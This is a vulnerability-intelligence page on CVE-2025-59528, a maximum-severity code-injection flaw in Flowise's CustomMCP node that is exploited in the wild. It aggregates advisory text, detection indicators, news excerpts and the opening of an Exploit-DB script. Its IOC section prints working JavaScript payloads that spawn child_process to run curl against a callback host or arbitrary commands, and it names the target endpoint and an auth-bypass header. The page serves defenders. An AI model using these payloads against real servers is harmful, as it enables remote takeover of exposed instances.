CVE-2025-59528
published 2025-09-22CVE-2025-59528: Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The…
PriorityP195critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
90.18%
99.8th percentile
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as child_process and fs. This issue has been patched in version 3.0.6.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flowiseai | flowise | — | — |
| flowiseai | flowise | — | — |
| flowiseai | flowise | >= 3.0.5 < 3.0.6 | 3.0.6 |
Detection & IOCsextracted from sources · hover to see the quote
command({x:(function(){const cp=process.mainModule.require("child_process");cp.execSync("curl {{interactsh-url}}");return 1;})()})↗
command({x:(function(){const cp = process.mainModule.require("child_process");cp.execSync("{cmd}");return 1;})()})↗
sigma↗
matchers: dsl: contains(interactsh_protocol, "dns") AND contains(content_type, "application/json") AND contains(body, "No Available Actions") AND status_code == 200
- →Monitor POST requests to /api/v1/node-load-method/customMCP with a JSON body containing 'mcpServerConfig' field holding JavaScript function expressions (e.g., patterns like '({x:(function(){' or 'process.mainModule.require') ↗
- →Flag requests to /api/v1/node-load-method/customMCP that include the header 'x-request-from: internal', as this header is used by exploit code to bypass authentication checks ↗
- →Exploitation activity has been observed originating from a single Starlink IP address; monitor for scanning/exploitation attempts from Starlink IP ranges against Flowise endpoints ↗
- →The Nuclei template for this CVE checks for 'No Available Actions' in the response body after posting to /api/v1/node-load-method/customMCP — a successful exploit response indicator ↗
- →Exploitation requires authentication (JWT token via /api/v1/auth/login); monitor for sequential login followed immediately by POST to /api/v1/node-load-method/customMCP as a behavioral chain indicator ↗
- ·The vulnerability exists in Flowise versions >= 2.2.7-patch.1 and up through 3.0.5; the Metasploit module targets a broad version range, so version fingerprinting is important for accurate scoping ↗
- ·Exploitation requires only an API token (authenticated), not unauthenticated access — detection rules should account for the authentication step preceding the exploit payload delivery ↗
- ·Between 12,000 and 15,000 Flowise instances are exposed online; it is unclear what percentage are running vulnerable versions, so broad network-level detection is warranted ↗
- ·CVE-2025-59528 exploitation is observed alongside two other actively exploited Flowise flaws (CVE-2025-8943 and CVE-2025-26319); detection coverage should address all three ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Flowise has Remote Code Execution vulnerability
osv·2025-09-15
CVE-2025-59528 [CRITICAL] Flowise has Remote Code Execution vulnerability
Flowise has Remote Code Execution vulnerability
## Description
### Cause of the Vulnerability
The `CustomMCP` node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server. This node parses the user-provided `mcpServerConfig` string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation.
Specifically, inside the `convertToValidJSONString` function, user input is directly passed to the `Function()` constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as `child_process` and `fs`.
### Vulnerability Flow
1. **User Input Received**: Input is provided via
GHSA
Flowise has Remote Code Execution vulnerability
ghsa·2025-09-15
CVE-2025-59528 [CRITICAL] CWE-94 Flowise has Remote Code Execution vulnerability
Flowise has Remote Code Execution vulnerability
## Description
### Cause of the Vulnerability
The `CustomMCP` node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server. This node parses the user-provided `mcpServerConfig` string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation.
Specifically, inside the `convertToValidJSONString` function, user input is directly passed to the `Function()` constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as `child_process` and `fs`.
### Vulnerability Flow
1. **User Input Received**: Input is provided via
VulnCheck
FlowiseAI Flowise Improper Control of Generation of Code ('Code Injection')
vulncheck·2025·CVSS 10.0
CVE-2025-59528 [CRITICAL] FlowiseAI Flowise Improper Control of Generation of Code ('Code Injection')
FlowiseAI Flowise Improper Control of Generation of Code ('Code Injection')
Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, Flowise is vulnerable to remote code execution. The CustomMCP node allows users to input configuration settings for connecting to an external MCP server. This node parses the user-provided mcpServerConfig string to build the MCP server configuration. However, during this process, it executes JavaScript code without any security validation. Specifically, inside the convertToValidJSONString function, user input is directly passed to the Function() constructor, which evaluates and executes the input as JavaScript code. Since this runs with full Node.js runtime privileges, it can access dangerous modules such as
No detection rules found.
Exploit-DB
Flowise 3.0.4 - Remote Code Execution (RCE)
exploitdb·2025-10-31·CVSS 9.8
CVE-2025-59528 [CRITICAL] Flowise 3.0.4 - Remote Code Execution (RCE)
Flowise 3.0.4 - Remote Code Execution (RCE)
---
# Exploit Title: Flowise 3.0.4 - Remote Code Execution (RCE)
# Date: 10/11/2025
# Exploit Author: [nltt0] (https://github.com/nltt-br))
# Vendor Homepage: https://flowiseai.com/
# Software Link: https://github.com/FlowiseAI/Flowise
# Version: < 3.0.5
# CVE: CVE-2025-59528
from requests import post, session
from argparse import ArgumentParser
banner = r"""
_____ _ _____
/ __ \ | | / ___|
| / \/ __ _| | __ _ _ __ __ _ ___ ___ \ `--.
| | / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \
| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ /
\____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/
__/ |
|___/
by nltt0
"""
try:
parser = ArgumentParser(description='CVE-2025-59528 [Flowise < 3.0.5]', usage="python CVE-2025-58434.py --email xtz@local --password
Nuclei
Flowise - Remote Code Execution
nuclei·CVSS 10.0
CVE-2025-59528 [CRITICAL] Flowise - Remote Code Execution
Flowise - Remote Code Execution
Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.
Template:
id: CVE-2025-59528
info:
name: Flowise - Remote Code Execution
author: xtr0nix
severity: critical
description: |
Flowise 3.0.5 contains a remote code execution vulnerability caused by unsafe evaluation of user input in the CustomMCP node's convertToValidJSONString function, letting remote attackers execute arbitrary code with full Node.js privileges, exploit requires user input to be processed by the vulnerable node.
impact: |
Attackers can e
Metasploit
Flowise JS Injection RCE
metasploit
Flowise JS Injection RCE
Flowise JS Injection RCE
This module exploits a remote code execution vulnerability in Flowise versions >= 2.2.7-patch.1 and = 3.0.1, authentication via FLOWISE_EMAIL and FLOWISE_PASSWORD is required due to JWT token verification.
Hackernews
⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
blogs_hackernews·2026-04-13·CVSS 8.6
[HIGH] ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## ⚡ Weekly Recap: Fiber Optic Spying, Windows Rootkit, AI Vulnerability Hunting and More
Monday is back, and the weekend’s backlog of chaos is officially hitting the fan. We are tracking a critical zero-day that has been quietly living in your PDFs for months, plus some aggressive state-sponsored meddling in infrastructure that is finally coming to light. It is one of those mornings where the gap between a quiet shift and a full-blown incident response is basically non-existent.
The variety this week is particularly nasty. We have AI models being turned into autonomous exploit engines, North Korean groups playing the long game
Bleepingcomputer
Max severity Flowise RCE vulnerability now exploited in attacks
blogs_bleepingcomputer·2026-04-07·CVSS 9.8
[CRITICAL] Max severity Flowise RCE vulnerability now exploited in attacks
## Max severity Flowise RCE vulnerability now exploited in attacks
## Bill Toulas
The developer addressed the issue in Flowise version 3.0.6. The latest current version is 3.1.1, released two weeks ago.
Flowise is an open-source , low-code platform for building AI agents and LLM-based workflows. It provides a drag-and-drop interface that lets users connect components into pipelines powering chatbots, automation, and AI systems.
It is used by a broad range of users, including developers working in AI prototyping, non-technical users working with no-code toolsets, and companies that operate customer support chatbots and knowledge-based assistants.
Caitlin Condon, security researcher at vulnerability intelligence company VulnCheck, announced on LinkedIn that exploitation of CVE-2025-5952
Hackernews
Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed
blogs_hackernews·2026-04-07·CVSS 9.8
CVE-2025-59528 [CRITICAL] Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed
Home
Threat Intelligence
Vulnerabilities
Cyber Attacks
Webinars
Expert Insights
Awards
Webinars
Awards
Free eBooks
About THN
Jobs
Advertise with us
## Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed
Threat actors are exploiting a maximum-severity security flaw in Flowise , an open-source artificial intelligence (AI) platform, according to new findings from VulnCheck.
The vulnerability in question is CVE-2025-59528 (CVSS score: 10.0), a code injection vulnerability that could result in remote code execution.
"The CustomMCP node allows users to input configuration settings for connecting to an external MCP (Model Context Protocol) server," Flowise said in an advisory released in September 2025. "This node parses the user-provided
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L132https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L220https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/components/nodes/tools/MCP/CustomMCP/CustomMCP.ts#L262-L270https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/controllers/nodes/index.ts#L57-L78https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/routes/node-load-methods/index.ts#L5https://github.com/FlowiseAI/Flowise/blob/5930f1119c655bcf8d2200ae827a1f5b9fec81d0/packages/server/src/services/nodes/index.ts#L91-L94https://github.com/FlowiseAI/Flowise/releases/tag/flowise%403.0.6https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-3gcm-f6qx-ff7p
2025-09-22
Published
Exploited in the wild